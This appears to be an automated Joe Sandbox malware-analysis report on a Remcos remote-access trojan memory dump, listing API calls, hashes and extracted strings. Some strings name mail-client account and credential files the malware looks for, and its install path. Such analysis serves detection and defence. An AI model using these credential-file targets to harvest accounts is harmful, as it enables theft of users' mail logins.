                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                    • Instruction ID: 237eaac65050e706cba1f7d12a66e0fc3e61b0fca0475dfc9c6fb6ee2f1d2aa6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9118E3154AB08FADA20ABB0FC45FCF7B9DEF24700F410824B799B6092DE24B6448761
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE91607
                                                                                                                                                                                    • _strcat.LIBCMT ref: 2DE9161D
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2DE9190E,?,?,00000000,?,00000000), ref: 2DE91643
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 2DE9165A
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,2DE9190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 2DE91661
                                                                                                                                                                                    • lstrcatW.KERNEL32(00001008,?), ref: 2DE91686
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1922816806-0
                                                                                                                                                                                    • Opcode ID: 4dc3014577440d77c2940331250495bfa33f737681f03ab7184b22758ad52b47
                                                                                                                                                                                    • Instruction ID: 8c7d66418def2e6f1d22d99fcce653e37748719a6d7a29403d63b3b04b164b55
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dc3014577440d77c2940331250495bfa33f737681f03ab7184b22758ad52b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D219536905208ABDB059B64DC84EFE77B9EF88724F24441BE604FB281DF34A54687A9
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 2DE91038
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2DE9104B
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2DE91061
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 2DE91075
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 2DE91090
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 2DE910B8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                                    • Opcode ID: 798db21d0edf82a9c54e9823d4c9faf1451cf5b259ca60febf2cd0661ec2cef8
                                                                                                                                                                                    • Instruction ID: 63b489895e1cebf52e001deb5408453ac62a5fba8a997e8adeee52500ddd9c48
                                                                                                                                                                                    • Opcode Fuzzy Hash: 798db21d0edf82a9c54e9823d4c9faf1451cf5b259ca60febf2cd0661ec2cef8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9421627690132CABCF10DB64DC48EEF3779EF44218F104296E959B71A1DE319A95CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,2DE93518,2DE923F1,2DE91F17), ref: 2DE93864
                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 2DE93872
                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2DE9388B
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,2DE93518,2DE923F1,2DE91F17), ref: 2DE938DD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                    • Opcode ID: 7d886d71935c931cbdcbdfefe8b09dba41ea3cabca5f9d60e53956b785a076cc
                                                                                                                                                                                    • Instruction ID: f31d33fecb4aafce24118a3d1cd8b232e8d978199e111ef805b0bb7758616bca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d886d71935c931cbdcbdfefe8b09dba41ea3cabca5f9d60e53956b785a076cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D01D87360F7226DE22115F96CC8ADA67E6DB15A7DF21022AE3A0B71D1FF1588018348
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,2DE96C6C), ref: 2DE95AFA
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95B2D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95B55
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,2DE96C6C), ref: 2DE95B62
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,2DE96C6C), ref: 2DE95B6E
                                                                                                                                                                                    • _abort.LIBCMT ref: 2DE95B74
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                    • Opcode ID: 87de57c01c3e3865e7123854e7eb2dbcaf56f4d6861a6def4101814682e1750a
                                                                                                                                                                                    • Instruction ID: ba5d52bc7d16ed37e5671e3cb82482c90ed94b0afc6b4cc58a0b3c7eb763a0d9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 87de57c01c3e3865e7123854e7eb2dbcaf56f4d6861a6def4101814682e1750a
                                                                                                                                                                                    • Instruction Fuzzy Hash: AFF0C8B350F911AAC20357346C45FEE26BADFE1979F260126FA16B6281FE2589024178
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrlenW.KERNEL32(?,?,?,?,?,2DE910DF,?,?,?,00000000), ref: 2DE91E9A
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrcatW.KERNEL32(?,?), ref: 2DE91EAC
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrlenW.KERNEL32(?,?,2DE910DF,?,?,?,00000000), ref: 2DE91EB3
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrlenW.KERNEL32(?,?,2DE910DF,?,?,?,00000000), ref: 2DE91EC8
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrcatW.KERNEL32(?,2DE910DF), ref: 2DE91ED3
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2DE9122A
                                                                                                                                                                                      • Part of subcall function 2DE9173A: _strlen.LIBCMT ref: 2DE91855
                                                                                                                                                                                      • Part of subcall function 2DE9173A: _strlen.LIBCMT ref: 2DE91869
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                    • API String ID: 4036392271-1520055953
                                                                                                                                                                                    • Opcode ID: 75e39cd7a822509c3f6c96b7e8d60eec0ece6744b614ece740c94672a164daec
                                                                                                                                                                                    • Instruction ID: 3e0db8621412df2cd767585444c7467ef584b7488a1c8f211cc54eaaf0a8b302
                                                                                                                                                                                    • Opcode Fuzzy Hash: 75e39cd7a822509c3f6c96b7e8d60eec0ece6744b614ece740c94672a164daec
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE21A279E15218AAEB1097A0EC81FFE7339EF90718F000556F705FB2E1EAB15E818759
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,2DE94AEA,?,?,2DE94A8A,?,2DEA2238,0000000C,2DE94BBD,00000000,00000000), ref: 2DE94B59
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,2DE94AEA,?,?,2DE94A8A,?,2DEA2238,0000000C,2DE94BBD,00000000,00000000), ref: 2DE94B6C
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,2DE94AEA,?,?,2DE94A8A,?,2DEA2238,0000000C,2DE94BBD,00000000,00000000,00000001,2DE92082), ref: 2DE94B8F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                    • Opcode ID: 1ca8b7cf641407626cc8f4d3a2d976a7982f54c9f4dc462b10eb6b6665e805d4
                                                                                                                                                                                    • Instruction ID: e4a59f5463cda024a0766a829c5fe5f0471695034de9c98a6a2f7b64c0741da1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ca8b7cf641407626cc8f4d3a2d976a7982f54c9f4dc462b10eb6b6665e805d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0C872902128BFCB019F90C808FED7FF9EF04769F004155F906B2250EF34A951CA54
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 2DE9715C
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2DE9717F
                                                                                                                                                                                      • Part of subcall function 2DE956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 2DE95702
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 2DE971A5
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE971B8
                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 2DE971C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                    • Opcode ID: c13fc82b6fc05fd9c55394bbfdddd0c26bb4c271537b0d3c9beee5a2772c9ba2
                                                                                                                                                                                    • Instruction ID: 48e10245781ea2f26d42374a408e0f3b748c9829c4cc4f3463696e69cf4de524
                                                                                                                                                                                    • Opcode Fuzzy Hash: c13fc82b6fc05fd9c55394bbfdddd0c26bb4c271537b0d3c9beee5a2772c9ba2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7501D8736072257BA7122AB74C89EFF2E6EEBC2DA4715052ABE04F7204DE649C0581B4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,2DE9636D,2DE95713,00000000,?,2DE92249,?,?,2DE91D66,00000000,?,?,00000000), ref: 2DE95B7F
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95BB4
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95BDB
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE95BE8
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE95BF1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,2DE910DF,?,?,?,00000000), ref: 2DE91E9A
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 2DE91EAC
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,2DE910DF,?,?,?,00000000), ref: 2DE91EB3
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,2DE910DF,?,?,?,00000000), ref: 2DE91EC8
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,2DE910DF), ref: 2DE91ED3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 493641738-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE991D0
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE991E2
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE991F4
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99206
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99218
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE9536F
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95381
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95394
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE953A5
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE953B6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\Remcos\remcos.exe,00000104), ref: 2DE94C1D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE94CE8
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE94CF2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                    • String ID: C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                    • API String ID: 2506810119-1832081669
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,2DE96FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 2DE98731
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 2DE987BA
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 2DE987CC
                                                                                                                                                                                    • __freea.LIBCMT ref: 2DE987D5
                                                                                                                                                                                      • Part of subcall function 2DE956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 2DE95702
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE9655C
                                                                                                                                                                                      • Part of subcall function 2DE962BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 2DE962BE
                                                                                                                                                                                      • Part of subcall function 2DE962BC: GetCurrentProcess.KERNEL32(C0000417), ref: 2DE962E0
                                                                                                                                                                                      • Part of subcall function 2DE962BC: TerminateProcess.KERNEL32(00000000), ref: 2DE962E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                    • String ID: *?$.
                                                                                                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                    • String ID: : $Se.
                                                                                                                                                                                    • API String ID: 4218353326-4089948878
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 2DE92903
                                                                                                                                                                                      • Part of subcall function 2DE935D2: RaiseException.KERNEL32(?,?,?,2DE92925,00000000,00000000,00000000,?,?,?,?,?,2DE92925,?,2DEA21B8), ref: 2DE93632
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 2DE92920
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,2DE96C7C,?), ref: 2DE96A1E
                                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,2DE96C7C,?), ref: 2DE96A35
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: |l-
                                                                                                                                                                                    • API String ID: 0-3309998742
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CommandLine
